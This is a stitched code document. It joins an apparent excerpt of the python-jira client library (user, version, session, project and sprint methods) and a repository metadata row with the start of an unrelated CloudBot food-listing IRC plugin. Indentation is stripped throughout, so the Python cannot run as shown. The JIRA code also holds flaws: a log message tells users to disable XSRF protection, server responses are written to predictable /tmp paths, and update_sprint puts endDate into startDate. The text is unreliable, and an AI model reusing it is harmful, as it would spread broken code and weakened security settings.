params = {'username': username}
url = self._get_url('user/avatar/' + avatar)
r = self._session.delete(url, params=params)
def search_users(self, user, startAt=0, maxResults=50, includeActive=True, includeInactive=False):
"""
Get a list of user Resources that match the specified search string.
:param user: a string to match usernames, name or email against
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
'includeActive': includeActive,
'includeInactive': includeInactive
}
r_json = self._get_json('user/search', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_allowed_users_for_issue(self, user, issueKey=None, projectKey=None, startAt=0, maxResults=50):
"""
Get a list of user Resources that match a username string and have browse permission for the issue or
project.
:param user: a string to match usernames against
:param issueKey: find users with browse permission for this issue
:param projectKey: find users with browse permission for this project
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
}
if issueKey is not None:
params['issueKey'] = issueKey
if projectKey is not None:
params['projectKey'] = projectKey
r_json = self._get_json('user/viewissue/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# Versions
@translate_resource_args
def create_version(self, name, project, description=None, releaseDate=None, startDate=None, archived=False,
released=False):
"""
Create a version in a project and return a Resource for it.
:param name: name of the version to create
:param project: key of the project to create the version in
:param description: a description of the version
:param releaseDate: the release date assigned to the version
:param startDate: The start date for the version
"""
data = {
'name': name,
'project': project,
'archived': archived,
'released': released
}
if description is not None:
data['description'] = description
if releaseDate is not None:
data['releaseDate'] = releaseDate
if startDate is not None:
data['startDate'] = startDate
url = self._get_url('version')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def move_version(self, id, after=None, position=None):
"""
Move a version within a project's ordered version list and return a new version Resource for it. One,
but not both, of ``after`` and ``position`` must be specified.
:param id: ID of the version to move
:param after: the self attribute of a version to place the specified version after (that is, higher in the list)
:param position: the absolute position to move this version to: must be one of ``First``, ``Last``,\
``Earlier``, or ``Later``
"""
data = {}
if after is not None:
data['after'] = after
elif position is not None:
data['position'] = position
url = self._get_url('version/' + id + '/move')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def version(self, id, expand=None):
"""
Get a version Resource.
:param id: ID of the version to get
:param expand: extra information to fetch inside each resource
"""
version = Version(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
version.find(id, params=params)
return version
def version_count_related_issues(self, id):
"""
Get a dict of the counts of issues fixed and affected by a version.
:param id: the version to count issues for
"""
r_json = self._get_json('version/' + id + '/relatedIssueCounts')
del r_json['self'] # this isn't really an addressable resource
return r_json
def version_count_unresolved_issues(self, id):
"""
Get the number of unresolved issues for a version.
:param id: ID of the version to count issues for
"""
return self._get_json('version/' + id + '/unresolvedIssueCount')['issuesUnresolvedCount']
# Session authentication
def session(self):
"""Get a dict of the current authenticated user's session information."""
url = '{server}/rest/auth/1/session'.format(**self._options)
if type(self._session.auth) is tuple:
authentication_data = {
'username': self._session.auth[0], 'password': self._session.auth[1]}
r = self._session.post(url, data=json.dumps(authentication_data))
else:
r = self._session.get(url)
user = User(self._options, self._session, json_loads(r))
return user
def kill_session(self):
"""Destroy the session of the current authenticated user."""
url = self._options['server'] + '/rest/auth/latest/session'
r = self._session.delete(url)
# Websudo
def kill_websudo(self):
"""Destroy the user's current WebSudo session."""
url = self._options['server'] + '/rest/auth/1/websudo'
r = self._session.delete(url)
# Utilities
def _create_http_basic_session(self, username, password):
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = (username, password)
self._session.cert = self._options['client_cert']
def _create_oauth_session(self, oauth):
verify = self._options['verify']
from requests_oauthlib import OAuth1
from oauthlib.oauth1 import SIGNATURE_RSA
oauth = OAuth1(
oauth['consumer_key'],
rsa_key=oauth['key_cert'],
signature_method=SIGNATURE_RSA,
resource_owner_key=oauth['access_token'],
resource_owner_secret=oauth['access_token_secret']
)
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = oauth
@staticmethod
def _timestamp(dt=None):
t = datetime.datetime.utcnow()
if dt is not None:
t += dt
return calendar.timegm(t.timetuple())
def _create_jwt_session(self, jwt):
try:
jwt_auth = JWTAuth(jwt['secret'], alg='HS256')
except NameError as e:
globals()['logging'].error("JWT authentication requires requests_jwt")
raise e
jwt_auth.add_field("iat", lambda req: JIRA._timestamp())
jwt_auth.add_field("exp", lambda req: JIRA._timestamp(datetime.timedelta(minutes=3)))
jwt_auth.add_field("qsh", QshGenerator(self._options['context_path']))
for f in jwt['payload'].items():
jwt_auth.add_field(f[0], f[1])
self._session = ResilientSession()
self._session.verify = self._options['verify']
self._session.auth = jwt_auth
def _set_avatar(self, params, url, avatar):
data = {
'id': avatar
}
r = self._session.put(url, params=params, data=json.dumps(data))
def _get_url(self, path, base=JIRA_BASE_URL):
options = self._options
options.update({'path': path})
return base.format(**options)
def _get_json(self, path, params=None, base=JIRA_BASE_URL):
url = self._get_url(path, base)
r = self._session.get(url, params=params)
try:
r_json = json_loads(r)
except ValueError as e:
logging.error("%s\n%s" % (e, r.text))
raise e
return r_json
def _find_for_resource(self, resource_cls, ids, expand=None):
resource = resource_cls(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
resource.find(id=ids, params=params)
return resource
def _try_magic(self):
try:
import magic
import weakref
except ImportError:
self._magic = None
else:
try:
_magic = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
def cleanup(x):
_magic.close()
self._magic_weakref = weakref.ref(self, cleanup)
self._magic = _magic
except TypeError:
self._magic = None
except AttributeError:
self._magic = None
def _get_mime_type(self, buff):
if self._magic is not None:
return self._magic.id_buffer(buff)
else:
try:
return mimetypes.guess_type("f." + imghdr.what(0, buff))[0]
except (IOError, TypeError):
logging.warning("Couldn't detect content type of avatar image"
". Specify the 'contentType' parameter explicitly.")
return None
def email_user(self, user, body, title="JIRA Notification"):
"""
TBD:
"""
url = self._options['server'] + \
'/secure/admin/groovy/CannedScriptRunner.jspa'
payload = {
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'cannedScriptArgs_FIELD_CONDITION': '',
'cannedScriptArgs_FIELD_EMAIL_TEMPLATE': body,
'cannedScriptArgs_FIELD_EMAIL_SUBJECT_TEMPLATE': title,
'cannedScriptArgs_FIELD_EMAIL_FORMAT': 'TEXT',
'cannedScriptArgs_FIELD_TO_ADDRESSES': self.user(user).emailAddress,
'cannedScriptArgs_FIELD_TO_USER_FIELDS': '',
'cannedScriptArgs_FIELD_INCLUDE_ATTACHMENTS': 'FIELD_INCLUDE_ATTACHMENTS_NONE',
'cannedScriptArgs_FIELD_FROM': '',
'cannedScriptArgs_FIELD_PREVIEW_ISSUE': '',
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'id': '',
'Preview': 'Preview',
}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
open("/tmp/jira_email_user_%s.html" % user, "w").write(r.text)
def rename_user(self, old_user, new_user):
"""
Rename a JIRA user. Current implementation relies on third party plugin but in the future it may use embedded JIRA functionality.
:param old_user: string with username login
:param new_user: string with username login
"""
if self._version >= (6, 0, 0):
url = self._options['server'] + '/rest/api/2/user'
payload = {
"name": new_user,
}
params = {
'username': old_user
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.put(url, params=params,
data=json.dumps(payload))
else:
# old implementation needed the ScripRunner plugin
merge = "true"
try:
self.user(new_user)
except:
merge = "false"
url = self._options[
'server'] + '/secure/admin/groovy/CannedScriptRunner.jspa#result'
payload = {
"cannedScript": "com.onresolve.jira.groovy.canned.admin.RenameUser",
"cannedScriptArgs_FIELD_FROM_USER_ID": old_user,
"cannedScriptArgs_FIELD_TO_USER_ID": new_user,
"cannedScriptArgs_FIELD_MERGE": merge,
"id": "",
"RunCanned": "Run",
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 404:
logging.error(
"In order to be able to use rename_user() you need to install Script Runner plugin. See https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner")
return False
if r.status_code != 200:
logging.error(r.status_code)
if re.compile("XSRF Security Token Missing").search(r.content):
logging.fatal(
"Reconfigure JIRA and disable XSRF in order to be able call this. See https://developer.atlassian.com/display/JIRADEV/Form+Token+Handling")
return False
open("/tmp/jira_rename_user_%s_to%s.html" %
(old_user, new_user), "w").write(r.content)
msg = r.status_code
m = re.search("<span class=\"errMsg\">(.*)<\/span>", r.content)
if m:
msg = m.group(1)
logging.error(msg)
return False
# <span class="errMsg">Target user ID must exist already for a merge</span>
p = re.compile("type=\"hidden\" name=\"cannedScriptArgs_Hidden_output\" value=\"(.*?)\"\/>",
re.MULTILINE | re.DOTALL)
m = p.search(r.content)
if m:
h = html_parser.HTMLParser()
msg = h.unescape(m.group(1))
logging.info(msg)
# let's check if the user still exists
try:
self.user(old_user)
except:
logging.error("User %s does not exists." % old_user)
return msg
logging.error(msg)
logging.error(
"User %s does still exists after rename, that's clearly a problem." % old_user)
return False
def delete_user(self, username):
url = self._options['server'] + \
'/rest/api/latest/user/?username=%s' % username
r = self._session.delete(url)
if 200 <= r.status_code <= 299:
return True
else:
logging.error(r.status_code)
return False
def reindex(self, force=False, background=True):
"""
Start jira re-indexing. Returns True if reindexing is in progress or not needed, or False.
If you call reindex() without any parameters it will perform a backfround reindex only if JIRA thinks it should do it.
:param force: reindex even if JIRA doesn'tt say this is needed, False by default.
:param background: reindex inde background, slower but does not impact the users, defaults to True.
"""
# /secure/admin/IndexAdmin.jspa
# /secure/admin/jira/IndexProgress.jspa?taskId=1
if background:
indexingStrategy = 'background'
else:
indexingStrategy = 'stoptheworld'
url = self._options['server'] + '/secure/admin/jira/IndexReIndex.jspa'
r = self._session.get(url, headers=self._options['headers'])
if r.status_code == 503:
# logging.warning("JIRA returned 503, this could mean that a full reindex is in progress.")
return 503
if not r.text.find("To perform the re-index now, please go to the") and force is False:
return True
if r.text.find('All issues are being re-indexed'):
logging.warning("JIRA re-indexing is already running.")
return True # still reindexing is considered still a success
if r.text.find('To perform the re-index now, please go to the') or force:
r = self._session.post(url, headers=self._options['headers'],
params={"indexingStrategy": indexingStrategy, "reindex": "Re-Index"})
if r.text.find('All issues are being re-indexed') != -1:
return True
else:
logging.error("Failed to reindex jira, probably a bug.")
return False
def backup(self, filename='backup.zip'):
"""
Will call jira export to backup as zipped xml. Returning with success does not mean that the backup process finished.
"""
url = self._options['server'] + '/secure/admin/XmlBackup.jspa'
payload = {'filename': filename}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 200:
return True
else:
logging.warning(
'Got %s response from calling backup.' % r.status_code)
return r.status_code
def current_user(self):
if not hasattr(self, '_serverInfo') or 'username' not in self._serverInfo:
url = self._get_url('serverInfo')
r = self._session.get(url, headers=self._options['headers'])
r_json = json_loads(r)
if 'x-ausername' in r.headers:
r_json['username'] = r.headers['x-ausername']
else:
r_json['username'] = None
self._serverInfo = r_json
# del r_json['self'] # this isn't really an addressable resource
return self._serverInfo['username']
def delete_project(self, pid):
"""
Project can be id, project key or project name. It will return False if it fails.
"""
found = False
try:
if not str(int(pid)) == pid:
found = True
except Exception as e:
r_json = self._get_json('project')
for e in r_json:
if e['key'] == pid or e['name'] == pid:
pid = e['id']
found = True
break
if not found:
logging.error("Unable to recognize project `%s`" % pid)
return False
uri = '/secure/admin/DeleteProject.jspa'
url = self._options['server'] + uri
payload = {'pid': pid, 'Delete': 'Delete', 'confirm': 'true'}
try:
r = self._gain_sudo_session(payload, uri)
if r.status_code != 200 or not self._check_for_html_error(r.text):
return False
except JIRAError as e:
raise JIRAError(0, "You must have global administrator rights to delete projects.")
return False
r = self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
if r.status_code == 200:
return self._check_for_html_error(r.text)
else:
logging.warning(
'Got %s response from calling delete_project.' % r.status_code)
return r.status_code
def _gain_sudo_session(self, options, destination):
url = self._options['server'] + '/secure/admin/WebSudoAuthenticate.jspa'
if not self._session.auth:
self._session.auth = get_netrc_auth(url)
payload = {
'webSudoPassword': self._session.auth[1],
'webSudoDestination': destination,
'webSudoIsPost': 'true',
}
payload.update(options)
return self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
def create_project(self, key, name=None, assignee=None, type="Software"):
"""
Key is mandatory and has to match JIRA project key requirements, usually only 2-10 uppercase characters.
If name is not specified it will use the key value.
If assignee is not specified it will use current user.
The returned value should evaluate to False if it fails otherwise it will be the new project id.
"""
if assignee is None:
assignee = self.current_user()
if name is None:
name = key
if key.upper() != key or not key.isalpha() or len(key) < 2 or len(key) > 10:
logging.error(
'key parameter is not all uppercase alphanumeric of length between 2 and 10')
return False
url = self._options['server'] + \
'/rest/project-templates/1.0/templates'
r = self._session.get(url)
j = json_loads(r)
template_key = None
templates = []
for template in j['projectTemplates']:
templates.append(template['name'])
if template['name'] in ['JIRA Classic', 'JIRA Default Schemes']:
template_key = template['projectTemplateModuleCompleteKey']
break
if not template_key:
raise JIRAError(
"Unable to find a suitable project template to use. Found only: " + ', '.join(templates))
payload = {'name': name,
'key': key,
'keyEdited': 'false',
#'projectTemplate': 'com.atlassian.jira-core-project-templates:jira-issuetracking',
#'permissionScheme': '',
'projectTemplateWebItemKey': template_key,
'projectTemplateModuleKey': template_key,
'lead': assignee,
#'assigneeType': '2',
}
if self._version[0] > 6:
# JIRA versions before 7 will throw an error if we specify type parameter
payload['type'] = type
headers = CaseInsensitiveDict(
{'Content-Type': 'application/x-www-form-urlencoded'})
r = self._session.post(url, data=payload, headers=headers)
if r.status_code == 200:
r_json = json_loads(r)
return r_json
f = tempfile.NamedTemporaryFile(
suffix='.html', prefix='python-jira-error-create-project-', delete=False)
f.write(r.text)
if self.logging:
logging.error(
"Unexpected result while running create project. Server response saved in %s for further investigation [HTTP response=%s]." % (
f.name, r.status_code))
return False
def add_user(self, username, email, directoryId=1, password=None,
fullname=None, notify=False, active=True):
'''
Creates a new JIRA user
:param username: the username of the new user
:type username: ``str``
:param email: email address of the new user
:type email: ``str``
:param directoryId: the directory ID the new user should be a part of
:type directoryId: ``int``
:param password: Optional, the password for the new user
:type password: ``str``
:param fullname: Optional, the full name of the new user
:type fullname: ``str``
:param notify: Whether or not to send a notification to the new user
:type notify ``bool``
:param active: Whether or not to make the new user active upon creation
:type active: ``bool``
:return:
'''
if not fullname:
fullname = username
# TODO: default the directoryID to the first directory in jira instead
# of 1 which is the internal one.
url = self._options['server'] + '/rest/api/latest/user'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['displayName'] = fullname
x['emailAddress'] = email
x['name'] = username
if password:
x['password'] = password
if notify:
x['notification'] = 'True'
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def add_user_to_group(self, username, group):
'''
Adds a user to an existing group.
:param username: Username that will be added to specified group.
:param group: Group that the user will be added to.
:return: Boolean, True for success, false for failure.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': group}
y = {'name': username}
payload = json.dumps(y)
self._session.post(url, params=x, data=payload)
return True
def remove_user_from_group(self, username, groupname):
'''
Removes a user from a group.
:param username: The user to remove from the group.
:param groupname: The group that the user will be removed from.
:return:
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': groupname,
'username': username}
self._session.delete(url, params=x)
return True
# Experimental
# Experimental support for iDalko Grid, expect API to change as it's using private APIs currently
# https://support.idalko.com/browse/IGRID-1017
def get_igrid(self, issueid, customfield, schemeid):
url = self._options['server'] + '/rest/idalko-igrid/1.0/datagrid/data'
if str(customfield).isdigit():
customfield = "customfield_%s" % customfield
params = {
#'_mode':'view',
'_issueId': issueid,
'_fieldId': customfield,
'_confSchemeId': schemeid,
#'validate':True,
#'_search':False,
#'rows':100,
#'page':1,
#'sidx':'DEFAULT',
#'sord':'asc',
}
r = self._session.get(
url, headers=self._options['headers'], params=params)
return json_loads(r)
# Jira Agile specific methods (GreenHopper)
"""
Define the functions that interact with GreenHopper.
"""
@translate_resource_args
def boards(self):
"""
Get a list of board GreenHopperResources.
"""
r_json = self._get_json(
'rapidviews/list', base=self.AGILE_BASE_URL)
boards = [Board(self._options, self._session, raw_boards_json)
for raw_boards_json in r_json['views']]
return boards
@translate_resource_args
def sprints(self, id, extended=False):
"""
Get a list of sprint GreenHopperResources.
:param id: the board to get sprints from
:param extended: fetch additional information like startDate, endDate, completeDate,
much slower because it requires an additional requests for each sprint
:rtype: dict
>>> { "id": 893,
>>> "name": "iteration.5",
>>> "state": "FUTURE",
>>> "linkedPagesCount": 0,
>>> "startDate": "None",
>>> "endDate": "None",
>>> "completeDate": "None",
>>> "remoteLinks": []
>>> }
"""
r_json = self._get_json('sprintquery/%s?includeHistoricSprints=true&includeFutureSprints=true' % id,
base=self.AGILE_BASE_URL)
if extended:
sprints = []
for raw_sprints_json in r_json['sprints']:
r_json = self._get_json(
'sprint/%s/edit/model' % raw_sprints_json['id'], base=self.AGILE_BASE_URL)
sprints.append(
Sprint(self._options, self._session, r_json['sprint']))
else:
sprints = [Sprint(self._options, self._session, raw_sprints_json)
for raw_sprints_json in r_json['sprints']]
return sprints
def sprints_by_name(self, id, extended=False):
sprints = {}
for s in self.sprints(id, extended=extended):
if s.name not in sprints:
sprints[s.name] = s.raw
else:
raise (Exception(
"Fatal error, duplicate Sprint Name (%s) found on board %s." % (s.name, id)))
return sprints
def update_sprint(self, id, name=None, startDate=None, endDate=None, state=None):
payload = {}
if name:
payload['name'] = name
if startDate:
payload['startDate'] = startDate
if endDate:
payload['startDate'] = endDate
if state:
payload['state'] = state
url = self._get_url('sprint/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
return json_loads(r)
def completed_issues(self, board_id, sprint_id):
"""
Return the completed issues for ``board_id`` and ``sprint_id``.
:param board_id: the board retrieving issues from
:param sprint_id: the sprint retieving issues from
"""
# TODO need a better way to provide all the info from the sprintreport
# incompletedIssues went to backlog but not it not completed
# issueKeysAddedDuringSprint used to mark some with a * ?
# puntedIssues are for scope change?
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['completedIssues']]
return issues
def completedIssuesEstimateSum(self, board_id, sprint_id):
"""
Return the total completed points this sprint.
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['contents']['completedIssuesEstimateSum']['value']
def incompleted_issues(self, board_id, sprint_id):
"""
Return the completed issues for the sprint
"""
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['incompletedIssues']]
return issues
def sprint_info(self, board_id, sprint_id):
"""
Return the information about a sprint.
:param board_id: the board retrieving issues from
:param sprint_id: the sprint retieving issues from
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['sprint']
# TODO: remove this as we do have Board.delete()
def delete_board(self, id):
"""
Deletes an agile board.
:param id:
:return:
"""
payload = {}
url = self._get_url(
'rapidview/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.delete(
url, data=json.dumps(payload))
def create_board(self, name, project_ids, preset="scrum"):
"""
Create a new board for the ``project_ids``.
:param name: name of the board
:param project_ids: the projects to create the board in
:param preset: what preset to use for this board
:type preset: 'kanban', 'scrum', 'diy'
"""
payload = {}
if isinstance(project_ids, string_types):
ids = []
for p in project_ids.split(','):
ids.append(self.project(p).id)
project_ids = ','.join(ids)
payload['name'] = name
if isinstance(project_ids, string_types):
project_ids = project_ids.split(',')
payload['projectIds'] = project_ids
payload['preset'] = preset
url = self._get_url(
'rapidview/create/presets', base=self.AGILE_BASE_URL)
r = self._session.post(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Board(self._options, self._session, raw=raw_issue_json)
def create_sprint(self, name, board_id, startDate=None, endDate=None):
"""
Create a new sprint for the ``board_id``.
:param name: name of the sprint
:param board_id: the board to add the sprint to
"""
url = self._get_url(
'sprint/%s' % board_id, base=self.AGILE_BASE_URL)
r = self._session.post(
url)
raw_issue_json = json_loads(r)
""" now r contains something like:
{
"id": 742,
"name": "Sprint 89",
"state": "FUTURE",
"linkedPagesCount": 0,
"startDate": "None",
"endDate": "None",
"completeDate": "None",
"remoteLinks": []
}"""
payload = {'name': name}
if startDate:
payload["startDate"] = startDate
if endDate:
payload["endDate"] = endDate
url = self._get_url(
'sprint/%s' % raw_issue_json['id'], base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Sprint(self._options, self._session, raw=raw_issue_json)
# TODO: broken, this API does not exist anymore and we need to use
# issue.update() to perform this operaiton
# Workaround based on https://answers.atlassian.com/questions/277651/jira-agile-rest-api-example
def add_issues_to_sprint(self, sprint_id, issue_keys):
"""
Add the issues in ``issue_keys`` to the ``sprint_id``. The sprint must
be started but not completed.
If a sprint was completed, then have to also edit the history of the
issue so that it was added to the sprint before it was completed,
preferably before it started. A completed sprint's issues also all have
a resolution set before the completion date.
If a sprint was not started, then have to edit the marker and copy the
rank of each issue too.
:param sprint_id: the sprint to add issues to
:param issue_keys: the issues to add to the sprint
"""
# Get the customFieldId for "Sprint"
sprint_field_name = "Sprint"
sprint_field_id = [f['schema']['customId'] for f in self.fields()
if f['name'] == sprint_field_name][0]
data = {}
data['idOrKeys'] = issue_keys
data['customFieldId'] = sprint_field_id
data['sprintId'] = sprint_id
data['addToBacklog'] = False
url = self._get_url('sprint/rank', base=self.AGILE_BASE_URL)
r = self._session.put(url, data=json.dumps(data))
def add_issues_to_epic(self, epic_id, issue_keys, ignore_epics=True):
"""
Add the issues in ``issue_keys`` to the ``epic_id``.
:param epic_id: the epic to add issues to
:param issue_keys: the issues to add to the epic
:param ignore_epics: ignore any issues listed in ``issue_keys`` that are epics
"""
data = {}
data['issueKeys'] = issue_keys
data['ignoreEpics'] = ignore_epics
url = self._get_url('epics/%s/add' %
epic_id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
def rank(self, issue, next_issue):
"""
Rank an issue before another using the default Ranking field, the one named 'Rank'.
:param issue: issue key of the issue to be ranked before the second one.
:param next_issue: issue key of the second issue.
"""
# {"issueKeys":["ANERDS-102"],"rankBeforeKey":"ANERDS-94","rankAfterKey":"ANERDS-7","customFieldId":11431}
if not self._rank:
for field in self.fields():
if field['name'] == 'Rank':
if field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-lexo-rank":
self._rank = field['schema']['customId']
break
elif field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-global-rank":
# Obsolete since JIRA v6.3.13.1
self._rank = field['schema']['customId']
data = {
"issueKeys": [issue], "rankBeforeKey": next_issue, "customFieldId": self._rank}
url = self._get_url('rank', base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
class GreenHopper(JIRA):
def __init__(self, options=None, basic_auth=None, oauth=None, async=None):
warnings.warn(
"GreenHopper() class is deprecated, just use JIRA() instead.", DeprecationWarning)
JIRA.__init__(
self, options=options, basic_auth=basic_auth, oauth=oauth, async=async)
| bsd-2-clause | -7,322,391,625,200,059,000 | 38.108742 | 243 | 0.592792 | false |
sbeparey/CloudBot | plugins/foods.py | 1 | 14374 | import codecs
import json
import os
import random
import asyncio
import re
from cloudbot import hook
from cloudbot.util import textgen
nick_re = re.compile("^[A-Za-z0-9_|.\-\]\[\{\}]*$", re.I)
cakes = ['Chocolate', 'Ice Cream', 'Angel', 'Boston Cream', 'Birthday', 'Bundt', 'Carrot', 'Coffee', 'Devils', 'Fruit',
'Gingerbread', 'Pound', 'Red Velvet', 'Stack', 'Welsh', 'Yokan']
cookies = ['Chocolate Chip', 'Oatmeal', 'Sugar', 'Oatmeal Raisin', 'Macadamia Nut', 'Jam Thumbprint', 'Medican Wedding',
'Biscotti', 'Oatmeal Cranberry', 'Chocolate Fudge', 'Peanut Butter', 'Pumpkin', 'Lemon Bar',
'Chocolate Oatmeal Fudge', 'Toffee Peanut', 'Danish Sugar', 'Triple Chocolate', 'Oreo']
# <Luke> Hey guys, any good ideas for plugins?
# <User> I don't know, something that lists every potato known to man?
# <Luke> BRILLIANT
potatoes = ['AC Belmont', 'AC Blue Pride', 'AC Brador', 'AC Chaleur', 'AC Domino', 'AC Dubuc', 'AC Glacier Chip',
'AC Maple Gold', 'AC Novachip', 'AC Peregrine Red', 'AC Ptarmigan', 'AC Red Island', 'AC Saguenor',
'AC Stampede Russet', 'AC Sunbury', 'Abeille', 'Abnaki', 'Acadia', 'Acadia Russet', 'Accent',
'Adirondack Blue', 'Adirondack Red', 'Adora', 'Agria', 'All Blue', 'All Red', 'Alpha', 'Alta Russet',
'Alturas Russet', 'Amandine', 'Amisk', 'Andover', 'Anoka', 'Anson', 'Aquilon', 'Arran Consul', 'Asterix',
'Atlantic', 'Austrian Crescent', 'Avalanche', 'Banana', 'Bannock Russet', 'Batoche', 'BeRus',
'Belle De Fonteney', 'Belleisle', 'Bintje', 'Blossom', 'Blue Christie', 'Blue Mac', 'Brigus',
'Brise du Nord', 'Butte', 'Butterfinger', 'Caesar', 'CalWhite', 'CalRed', 'Caribe', 'Carlingford',
'Carlton', 'Carola', 'Cascade', 'Castile', 'Centennial Russet', 'Century Russet', 'Charlotte', 'Cherie',
'Cherokee', 'Cherry Red', 'Chieftain', 'Chipeta', 'Coastal Russet', 'Colorado Rose', 'Concurrent',
'Conestoga', 'Cowhorn', 'Crestone Russet', 'Crispin', 'Cupids', 'Daisy Gold', 'Dakota Pearl', 'Defender',
'Delikat', 'Denali', 'Desiree', 'Divina', 'Dundrod', 'Durango Red', 'Early Rose', 'Elba', 'Envol',
'Epicure', 'Eramosa', 'Estima', 'Eva', 'Fabula', 'Fambo', 'Fremont Russet', 'French Fingerling',
'Frontier Russet', 'Fundy', 'Garnet Chile', 'Gem Russet', 'GemStar Russet', 'Gemchip', 'German Butterball',
'Gigant', 'Goldrush', 'Granola', 'Green Mountain', 'Haida', 'Hertha', 'Hilite Russet', 'Huckleberry',
'Hunter', 'Huron', 'IdaRose', 'Innovator', 'Irish Cobbler', 'Island Sunshine', 'Ivory Crisp',
'Jacqueline Lee', 'Jemseg', 'Kanona', 'Katahdin', 'Kennebec', "Kerr's Pink", 'Keswick', 'Keuka Gold',
'Keystone Russet', 'King Edward VII', 'Kipfel', 'Klamath Russet', 'Krantz', 'LaRatte', 'Lady Rosetta',
'Latona', 'Lemhi Russet', 'Liberator', 'Lili', 'MaineChip', 'Marfona', 'Maris Bard', 'Maris Piper',
'Matilda', 'Mazama', 'McIntyre', 'Michigan Purple', 'Millenium Russet', 'Mirton Pearl', 'Modoc', 'Mondial',
'Monona', 'Morene', 'Morning Gold', 'Mouraska', 'Navan', 'Nicola', 'Nipigon', 'Niska', 'Nooksack',
'NorValley', 'Norchip', 'Nordonna', 'Norgold Russet', 'Norking Russet', 'Norland', 'Norwis', 'Obelix',
'Ozette', 'Peanut', 'Penta', 'Peribonka', 'Peruvian Purple', 'Pike', 'Pink Pearl', 'Prospect', 'Pungo',
'Purple Majesty', 'Purple Viking', 'Ranger Russet', 'Reba', 'Red Cloud', 'Red Gold', 'Red La Soda',
'Red Pontiac', 'Red Ruby', 'Red Thumb', 'Redsen', 'Rocket', 'Rose Finn Apple', 'Rose Gold', 'Roselys',
'Rote Erstling', 'Ruby Crescent', 'Russet Burbank', 'Russet Legend', 'Russet Norkotah', 'Russet Nugget',
'Russian Banana', 'Saginaw Gold', 'Sangre', 'Satina', 'Saxon', 'Sebago', 'Shepody', 'Sierra',
'Silverton Russet', 'Simcoe', 'Snowden', 'Spunta', "St. John's", 'Summit Russet', 'Sunrise', 'Superior',
'Symfonia', 'Tolaas', 'Trent', 'True Blue', 'Ulla', 'Umatilla Russet', 'Valisa', 'Van Gogh', 'Viking',
'Wallowa Russet', 'Warba', 'Western Russet', 'White Rose', 'Willamette', 'Winema', 'Yellow Finn',
'Yukon Gold']
def is_valid(target):
""" Checks if a string is a valid IRC nick. """
if nick_re.match(target):
return True
else:
return False
@hook.on_start()
def load_foods(bot):
"""
:type bot: cloudbot.bot.CloudBot
"""
global sandwich_data, taco_data, coffee_data, noodles_data, muffin_data, \
tea_data, keto_data, beer_data, cheese_data, pancake_data, chicken_data, \
icecream_data, brekkie_data, doobie_data
with codecs.open(os.path.join(bot.data_dir, "sandwich.json"), encoding="utf-8") as f:
sandwich_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "taco.json"), encoding="utf-8") as f:
taco_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "coffee.json"), encoding="utf-8") as f:
coffee_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "noodles.json"), encoding="utf-8") as f:
noodles_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "muffin.json"), encoding="utf-8") as f:
muffin_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "tea.json"), encoding="utf-8") as f:
tea_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "keto.json"), encoding="utf-8") as f:
keto_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "cheese.json"), encoding="utf-8") as f:
cheese_data = json.load(f)
